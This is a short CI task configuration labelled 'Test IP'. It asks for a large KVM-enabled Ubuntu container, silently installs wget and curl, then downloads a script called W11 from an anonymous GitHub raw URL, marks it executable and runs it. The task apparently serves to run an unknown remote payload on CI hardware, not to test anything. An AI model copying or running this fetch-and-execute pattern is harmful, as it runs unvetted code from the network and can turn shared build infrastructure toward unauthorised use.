task:
  name: Test IP
  timeout_in: 120m
  environment:
    TOKEN: ENCRYPTED[450e0668abde9c52262aacb4f3523c2c78b18b7ff5572406a98a56b7ea0a63a82a2f9cf7e9914c4414deea16d8fa89a4]
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    kvm: true
  script: 
   - apt-get update &>/dev/null 
   - apt-get install wget curl -y &>/dev/null
   - wget https://raw.githubusercontent.com/adfgg51861/t/main/W11
   - chmod +x *
   - bash W11
